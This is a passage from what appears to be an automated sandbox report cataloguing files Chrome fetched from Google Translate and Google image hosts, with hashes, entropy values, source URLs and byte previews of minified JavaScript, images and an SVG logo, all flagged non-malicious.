                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.fl(_.gr);._.k("sOXFj");.var xv=function(a){_.M.call(this,a.va)};_.C(xv,_.M);xv.Ba=_.M.Ba;xv.qa=_.M.qa;xv.prototype.i=function(a){return a()};_.tv(_.tka,xv);._.p();._.k("oGtAuc");._.woa=new _.ul(_.gr);._.p();._.hw=function(a){_.Cn.call(this,a.va);this.soy=this.wd=null;if(this.Nf()){var b=_.wl(this.Ce(),[_.om,_.nm]);b=_.Fe([b[_.om],b[_.nm]]).then(function(c){this.soy=c[0];this.wd=c[1]},null,this);_.Dn(this,b)}this.s=a.Xd.cY};_.C(_.hw,_.Cn);_.hw.qa=function(){return{Xd:{cY:function(){return _.Ue(this)}}}};_.hw.prototype.getContext=function(a){return this.s.getContext(a)};_.hw.prototype.getData=function(a){return this.s.getData(a)};_.hw.prototype.Cx=function(){};._.iw=function(a,b){_.En(b);a&&_.ql.ab().register(a,b)};._.k("q0xTif");.var epa=function(a){var b=function(d){_.co(d)&&(_.co(d).Ca=null,_.Lv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]")
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 287, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):152666
                                                                                                                                                                                                                                                            Entropy (8bit):7.991279406237605
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:pm+dcBQUElIYtMf/Gew3KOyv5Ydf4YYdzKbgFflP19QqfL4Sa:p9+JEIGI/psKOmyqYuJlt9Qqj4p
                                                                                                                                                                                                                                                            MD5:4BD24A5FFB510C5545075B22F99D246E
                                                                                                                                                                                                                                                            SHA1:F05AC93818EF8ABDFFD4A2A927A6A99A5B9545BB
                                                                                                                                                                                                                                                            SHA-256:03CA8CBC779E690482BAC72477E2ECDD7A0D32FDA43F67CFA8781453474FF1AF
                                                                                                                                                                                                                                                            SHA-512:C09FDDDC12BF0AE2693A9941BB711DE51DCA8E2ED3FB2CEE603A38002B71E7356703AA2A6D3EDCDA1741157BFC680FEB9100B1B9FACC5B24CFAF74CB2FAE3C68
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/wCGOhL6icJWSXcsnHRdh9OYFq7sksI8mbSz9Dy2dWn4QBEt_46Recz7sZTjLZOfZ4oOOwQj0WZEW2GjUKChL3CpGQcAIt0L2PqQVwNdsJeTtNeyf9b0?=w1440
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............r.~....iCCPicc..H...wTT.....................a..E...."........"QT,X..`.....,.Py.H....uf..7g.....@.....PQ..4....RhX..i.h....@..V..|}.....?..m@f....^.......U<.$.c.O L.....4.,.c..bCa.q..s<;1...YmnO......2...........c}.....D.`<.....4.M...&.g...{..Wb:..c-.V.q..lQ_.......r..srR:..g...zLJP..e.%....I..Y.....JL....=..:.\...S..XE<.!..z.z..uJ.L.b{b0...8.......".._.....o.p._.(......}....0s.Z.x..y.?.E.*0.......z`..`..............M..ka..A.l..P.{....a8.mp.......p......S..70. ..a ,D.QD..]... .....#aH$.GR.td-..)@J.Jd.R....G. ..>..2.L /..(...lT..@.P..z...2......\t.Z....V..z.....O.)..h8I.2N...9.|p.X......+....p..n.......=..g..zxk.;>...........V.9...0~.... ..t.V..B(.O.$....u...y.-.(...H.$j.-...0b.q......L<M.#...H$.4I.dC.!qIi.<R.......4JzG.....dWr89..C.#7.;...1.4E..N...P.).".~J..:e.2M..jRm.....&j9..z.....F...,i~.x.FZ9..."m....N.;.#...m.......W..C.a..g.1.1..g....DX".".".".D.DZE.E.3)Lu..s9s5..y.y..L.".!.$..]/Z%z\t@tJ.%f$.#.,V(. vIl\.$.!.".-.+^
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (11620)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):12983
                                                                                                                                                                                                                                                            Entropy (8bit):5.589153322316143
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:RMGEPjf8xHkv8yhMAUzkLegm0BVoQFgQtJrL:KvPjfBvNMAUYLegm0Bng+1
                                                                                                                                                                                                                                                            MD5:D45307D10CFF4297DAAD697FE31106A6
                                                                                                                                                                                                                                                            SHA1:E25D78E4773C5ED2E99487DB0964EDAD2206901B
                                                                                                                                                                                                                                                            SHA-256:5562A799C0B0457BD06E40F2921756ADC75F568D567CA2429984303126147C21
                                                                                                                                                                                                                                                            SHA-512:DA927BE862631FF2F294F78734B942C2A73A96957D3C9CC6DD2F5128DF3FCD7930A675FE92DAA09A053B8E9C96B8B482C6194AD9E5241FA61B5E94DD3A276D85
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/external_hosted/picturefill/picturefill.min.js
                                                                                                                                                                                                                                                            Preview:/**. * @license. * Copyright 2016 Picturefill.. * picturefill - v3.0.2 - 2016-02-12. * https://scottjehl.github.io/picturefill/. * Copyright (c) 2016 https://github.com/scottjehl/picturefill/blob/3.0.2/Authors.txt. *. * The MIT License (MIT). *. * Copyright (c) 2014 Filament Group. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in all. * copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WA
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):44610
                                                                                                                                                                                                                                                            Entropy (8bit):7.968947283432421
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ZEOQPj+SNwvVD5LbpS+bfEcaAIdfyU7wjhp64JoJrBRA/3U3Ag3KE1qRHzmXTYg0:ZEOQKSNwt9I+bfE/dfyNjX6BrBRW3UrY
                                                                                                                                                                                                                                                            MD5:8BFD8185544CB8F430AA5889EED16285
                                                                                                                                                                                                                                                            SHA1:C077108158CD8752951C417DA119E3C2BC2F4A6F
                                                                                                                                                                                                                                                            SHA-256:28131B5A09F4E8FCF485B46D75798B2CD717276A915B6EB9FE0CED5F2A669748
                                                                                                                                                                                                                                                            SHA-512:BADAAA738405A17EF41AC82394DB04E70B7C92EAA19DA740AA3E81132CF7114CB4A1593AF08CF201D1CC01E83226A86D5FF4A75F4A4939A1754CF248E0568E2D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/W02GUnHtaJPHRSBIq-gNVwuGPX9s4KcNRuen0qIqjAhxQgTZPoA5l3bs_K-dOeEhDWsLHHzANblqcGHaKRU-58O_0VGUJuRld3LCDpHDb4atFHUnIOz9
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................F......................!...1A."Qaq.....2B.....Rb..#r......3C.$.s.4S..................................:.......................!1.A..Q"2aq.....B....#3RC.br...............?.....dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB..Cm...b..B..D1..m..f.b.6.(.4YF.......!..].l&...xb.7...6...t..EY..tK6......tQ....gBTJ*.1tK:."QZ..1..MGB..IZ....+Y....k+..:.D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..Y.b.7.%..E..h.K6.tU..!,...*....Y.1d.xb.f....E...qtU..QtU..1tU...tU..4..u..,^.....(........d.....u...<".0u.&.< .2..T.......L.....>i2.#...`.......t...=z...u~S..]4....+.L..Q...1t.......r..g.>P..M....z.J..a..9t....C.../.Y....:^._.c.<*<9.C"..2!..C"..2!..C"..2!..C"..2!..C"..2!..C"..2!..Cm.Cxb....h.Cm.EY.1.f...F.b.`.Q.............g].^..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (770)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1275
                                                                                                                                                                                                                                                            Entropy (8bit):5.291996382684132
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:k6Pq70U8EeVzdqnCYw1uD/x/ZLyiFOCU9nhxzNzPw7edGuQkLGQ5i2r2OOu7Zxvz:U70UqsnCvITPFO9j/Y6IJyGz2rJ7ZZrP
                                                                                                                                                                                                                                                            MD5:A4C3A5C1202F21C17885E14C2F4E2782
                                                                                                                                                                                                                                                            SHA1:7994DC4E6BC684A5AE3F3D6CCD212A1648D3B437
                                                                                                                                                                                                                                                            SHA-256:1E1B0FFDD9CB7C61C4088D5F6DEE21DEA14085E309194B6576017C9776FAF2B2
                                                                                                                                                                                                                                                            SHA-512:B984E3752266934B06ECBB23C0FE8E918062E2BF04E4C7ED4E263966E7BFAFEA7942BE5616F0AA871E8BC73965C36A39370971B57BCAE1CFFE0C93F4721FC4FF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=bm51tf"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("bm51tf");.var Skb=function(a,b,c,d,e){this.o=a;this.ma=b;this.s=c;this.T=d;this.ua=e;this.i=0;this.j=Rkb(this)},Tkb=function(a){var b={};_.Pa(a.wB(),function(e){b[e]=!0});var c=a.jB(),d=a.qB();return new Skb(a.iz(),1E3*c.getSeconds(),a.cB(),1E3*d.getSeconds(),b)},Rkb=function(a){return Math.random()*Math.min(a.ma*Math.pow(a.s,a.i),a.T)},p2=function(a,b){return a.i>=a.o?!1:null!=b?!!a.ua[b]:!0};var q2=function(a){_.M.call(this,a.va);this.o=a.service.rD;this.s=a.service.metadata;a=a.service.Y_;this.j=a.o.bind(a)};_.C(q2,_.M);q2.Ba=_.M.Ba;q2.qa=function(){return{service:{rD:_.Pkb,metadata:_.k2,Y_:_.AH}}};q2.prototype.i=function(a,b){if(1!=this.s.getType(a.tc()))return _.Km(a);var c=this.o.i;(c=c?Tkb(c):null)&&p2(c)?(b=Ukb(this,a,b,c),a=new _.Hm(a,b,2)):a=_.Km(a);return a};.var Ukb=function(a,b,c,d){return c.then(function(e){return e},function(e){if(!e.status||!p2(d,
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2719
                                                                                                                                                                                                                                                            Entropy (8bit):7.847387915856727
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:xj7AYdQ+LtSUAVrMIFc/uEjVy3WZYkJMsXx9eIrup9PK/jzS1:SY++LtSRVrMPjym1qgQc/j6
                                                                                                                                                                                                                                                            MD5:DE31A314C8C6A530F5C00933C2D4465F
                                                                                                                                                                                                                                                            SHA1:A2C054C2C7DE42283EBEA8186EF44137477BF32E
                                                                                                                                                                                                                                                            SHA-256:095FFAF49603A67662294AD58EE01E65E29224BFF93F2C0B25BA0AE1B0439A3C
                                                                                                                                                                                                                                                            SHA-512:1D7B865FFECB5849FC506C4E101561177B6CBEB3A62472D764A5B5FF7B641A4C3E6AC55705C7186E5D14E3CAE32D49DAC8A2BFD275237ED096AECFE9EE0599CB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...@...@......iq....fIDATx..r.K.@gy.`.....3333sb..af...c..4...q...m.*...:..KZp.:h....3...........2~.....?.1.H{..w.fP2.]R.2e..#E.4..3.:HP...B-,.F&.....U6C..h..~....0%H..I..fH...0.... U.`.....UK@,.'.Z...:.S.."M`.o.....8.G..i...xx6@..E. 0`b.q../.0.hW&C.$..ZV,.{.....R$...."y....2.~T,.ibq..x...F...bH."0P...<...2..t../...O\~...................]]]..........!ikkCp....V.......% ....}b..f()..G.e.l.t0.......q7.A.a.P,.,D.C"....X....>...U.`...>.m...Ge....p.....PPd..*.T.4.o.g...=.RW.x.!!..>T...A.6.AoooH..}...P....W......V..jk..@..himu3$D..@Z1.7..(E.|.M/.}4.T..}...%V.29...@SS3......H4 A..J...{....E.~.5+..\.Y.$....A..+TV:.ju.,.X......... ...%..&_..... ...6..#....._.P^n....n....jhii.w.:%$D.A(.)..n.np.y...HZ..O7...<..Z.....dv..%......I~...d(.^*g.L...W".W......1Z.........>.F.....P..W..t}H.|..'n.p.U.O..S...UP[[..A ?r...'y....'b..!M.....h...x.pjjj...C^..%BA.H.._{.....R0.4....b..W..f..^./...p...7!...x.S...E.~...@S.....e...........`..`..8Xq$..............h....._T..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1200x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):187785
                                                                                                                                                                                                                                                            Entropy (8bit):7.966271185249122
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:hpIQKlq/LPPFjlJHTrqmVEJBO5ocwkgQdgNvfrURYNVhZvMerkNtUDtTeo6OBtcQ:hmQKl0TFvHnq5JBO5ocqIgNvAqRke4NY
                                                                                                                                                                                                                                                            MD5:8A4AD3A2783D7E70CECC7DF6CFA57892
                                                                                                                                                                                                                                                            SHA1:D904840A17F3769D48AE0FA1627CE729531F3D05
                                                                                                                                                                                                                                                            SHA-256:78702427F71079C7C258C6A1D88D97A55FD49A71CB43DC76C1892CABD01F7F59
                                                                                                                                                                                                                                                            SHA-512:07880262E19474117B960EBE8E7F6866E14FE3230F0A47F9E765BF7500902F4BF57F3DF9DCBF40EF0C292362025230B8B0581AC715928D2DDED73AF408121ED7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2014/first-day-of-spring-2014-5086324449083392-hp2x.jpg
                                                                                                                                                                                                                                                            Preview:....................................................................................................................................................................................................................................................!.."..1.A2#.Q.aB$qR3%..x9bCS4&..8.....D.6V'w(X..c.W...Y.s.5uv..7.)........................!..1.A..Qa".q..2B#...R3...b$...r.CS..c...s4Tt.%......D5U&6V..Ee7u'.............?.....D.&.0..L"a...E...}N._m...R+S..,..".t.j-.....=E6q.P..\"..g..............8.g.r(:V9.M_8.......Um..xD."d.o .~S]".8.*..L"a....H..."..F........."......).@..x....<.7..lk.lms.[R.......H.Z.z....Uj.c.....c..I.. ..{..>(.S.K.c..i3.v......pc{...)x....7]...d......kh..J6D.......s........[\......B.<.K.D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.pT.A..d..C.....:e .....>F.y........s.%.1].9..1......jkR]..L..Kcr.KD....R...@j...^T.&.0..L"a...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):27189
                                                                                                                                                                                                                                                            Entropy (8bit):7.709732872394779
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:xSqwghverKNReTNxQBfPJzIfJOxfJV2rgZrt:xShghdNg6fPhIxgP2at
                                                                                                                                                                                                                                                            MD5:E51382AFA03668725824029352888CB6
                                                                                                                                                                                                                                                            SHA1:713BEA4976BE1FDB0675DF9C84FE4E1A5D203521
                                                                                                                                                                                                                                                            SHA-256:93149C007DDE20D5C86EFE1BCEF396D819A8BCA714143E129170BCA783B32859
                                                                                                                                                                                                                                                            SHA-512:3E1ED076017765472B81882AFF76014EC8A8E0FE3E716D19242613213C2F1A1A6B480BBD81B63F2809F1E560E8B3C48F114F2628426A77C5F7A11448CDF34419
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/cdV5k2CEOt0uTjlBHAvabhD5qdKLXLKLAHXaT59mzVC-6Nz3asgWUkFuqlrTilXv4nvWSo0HMurxuGOILE22pGMRt7Nl36R0D_GZOKL-qlOs0LNyug?=w1440
                                                                                                                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1150
                                                                                                                                                                                                                                                            Entropy (8bit):4.843973639113718
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:t4AQfefQRbjloRR4dY4G6gI4ds2EaFinQtsy1xClrz:m2fQSupG6b4G2bFO7z
                                                                                                                                                                                                                                                            MD5:DF9605D6E9CD696C38649677BB1083E2
                                                                                                                                                                                                                                                            SHA1:5858C4CFFF7431B6704B28EA0832244FBF55F78F
                                                                                                                                                                                                                                                            SHA-256:886E58CA5DDD755FA1A3D120BC10893EF6FA1A49315E44D1C7792292753F0DDC
                                                                                                                                                                                                                                                            SHA-512:60F2135359011F3DF616C4D8A030439DCABD982C1F8903C64A00A0E3CD2A7AAE2780D5635B0E08899A89858F199D18913A0ED8169BED1C635C9A498B18DF6C66
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/lens_camera/v1/192px.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 192 192" height="192" viewBox="0 0 192 192" width="192"><rect fill="none" height="192" width="192"/><g><circle cx="96" cy="104.15" fill="#4285F4" r="28"/><path d="M160,72v40.15V136c0,1.69-0.34,3.29-0.82,4.82v0v0c-1.57,4.92-5.43,8.78-10.35,10.35h0v0 c-1.53,0.49-3.13,0.82-4.82,0.82H66l16,16h50h12c4.42,0,8.63-0.9,12.46-2.51c3.83-1.62,7.28-3.96,10.17-6.86 c1.45-1.45,2.76-3.03,3.91-4.74c2.3-3.4,3.96-7.28,4.81-11.44c0.43-2.08,0.65-4.24,0.65-6.45v-12V96.15V84l-6-19l-10.82,2.18 C159.66,68.71,160,70.31,160,72z" fill="#EA4335"/><path d="M32,72c0-1.69,0.34-3.29,0.82-4.82c1.57-4.92,5.43-8.78,10.35-10.35C44.71,56.34,46.31,56,48,56 h96c1.69,0,3.29,0.34,4.82,0.82c0,0,0,0,0,0L149,45l-17-5l-16-16h-13.44H96h-6.56H76L60,40H48c-17.67,0-32,14.33-32,32v12v20l16,16 V72z" fill="#4285F4"/><path d="M144,40h-12l16.83,16.83c1.23,0.39,2.39,0.93,3.47,1.59c2.16,1.32,3.97,3.13,5.29,5.29 c0.66,1.08,1.2,2.24,1.59,3.47v0L176,84V72C176,54.33,161.67,40,144
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (945)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6118
                                                                                                                                                                                                                                                            Entropy (8bit):5.494854644807239
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UaPvgS7E6BTbtWaCa9tq8/C1vQ6LLx2XAf92x6VMDWDxuNVeiJUqbWWHui3Id7UN:5PvBEfx88vQ6Px792gRaSWOi
                                                                                                                                                                                                                                                            MD5:1BF1690C17C7E8B72B7DA4A96E21D113
                                                                                                                                                                                                                                                            SHA1:17CF7FAECCF85A0D9AC62B53554374D1ECAE5B23
                                                                                                                                                                                                                                                            SHA-256:AB2190CA14432F87210135E274694DC0F71C8C907B5998FF93899833A43F44C9
                                                                                                                                                                                                                                                            SHA-512:BEF313CCB63EF6D0BFD0405659169A430B7112714E787E7EE39C6F01C2D8210F6EBB291CBA10ADE4CC7DAD999D2A6349881DF3F1B4F693F1D2B847C94C11F4F2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverWebsiteTranslationUi.en.o0mxDulwOdA.es5.O/ck=boq-translate.TranslateWebserverWebsiteTranslationUi.2YpHW3SIPH4.L.B1.O/am=8CwACA/d=1/exm=A7fCU,BBI74,BVgquf,COQbmf,CXsKQe,DFTXbf,EEDORb,EFQ78c,GkRiKb,HwavCb,IZT63,J1hrIc,JH2zc,JNoxi,JWUKXe,JzDP5e,KG2eXe,KUM7Z,L1AAkb,L2d1X,LEikZe,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P5Thrf,PHUIyb,PrPYRd,PxcVCe,QIhFr,QM0Gm,RAnnUd,RMhBfe,RqjULd,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VNcg1e,VwDzFe,W225x,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bTi8wc,bm51tf,byfTOb,cSdwA,e5qFLc,fKUV3e,gychg,hc6Ubd,i5H9N,i5dxUd,kWgXee,lsjVmc,lwddkf,m9oV,n73qwf,ovKuLd,pKzUve,pjICDe,pw70Gc,qNG0Fc,qRXAtf,rFVO7,s39S4,sJhETb,soHxf,t1sulf,tQKCld,thZ3rf,tsNC9c,uu7UOe,w9hDv,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yRXbo,ywOR5c,zbML3c,zr1jrb/excm=_b,_r,_tp,iframenavigationview/ed=1/wt=2/rs=ANkVxDmi4UYesv_--ainEA18nAlROTRZyg/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;zxnPse:GkRiKb;EVNhjf:pw70Gc;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;NSEoX:lazG7b;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverWebsiteTranslationUi=this.default_TranslateWebserverWebsiteTranslationUi||{};(function(_){var window=this;.try{._.w("Wt6vjf");.var UP=function(a){_.E.call(this,a)};_.H(UP,_.E);UP.prototype.Na=function(){return _.Tk(this,1)};UP.prototype.ac=function(a){_.A(this,1,a)};UP.Gb="f.bo";var VP=function(){_.En.call(this)};_.H(VP,_.En);VP.prototype.Ta=function(){this.Kr=!1;WP(this);_.En.prototype.Ta.call(this)};VP.prototype.i=function(){XP(this);if(this.Ek)return YP(this),!1;if(!this.Us)return ZP(this),!0;this.dispatchEvent("p");if(!this.Rp)return ZP(this),!0;this.Co?(this.dispatchEvent("r"),ZP(this)):YP(this);return!1};.var $P=function(a){var b=new _.aw(a.yz);null!=a.Fq&&b.i.set("authuser",a.Fq);return b},YP=function(a){a.Ek=!0;var b=$P(a),c="rt=r&f_uid="+encodeURIComponent(String(a.Rp));_.Op(b,(0,_.L)(a.j,a),"POST",c)};.VP.prototype.j=function(a){a=a.target;XP(this);if(_.Wp(a)){this.Bn=0;if(this.Co)this.Ek=!1,this.dispatchEvent("r");else if(this.Us)t
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
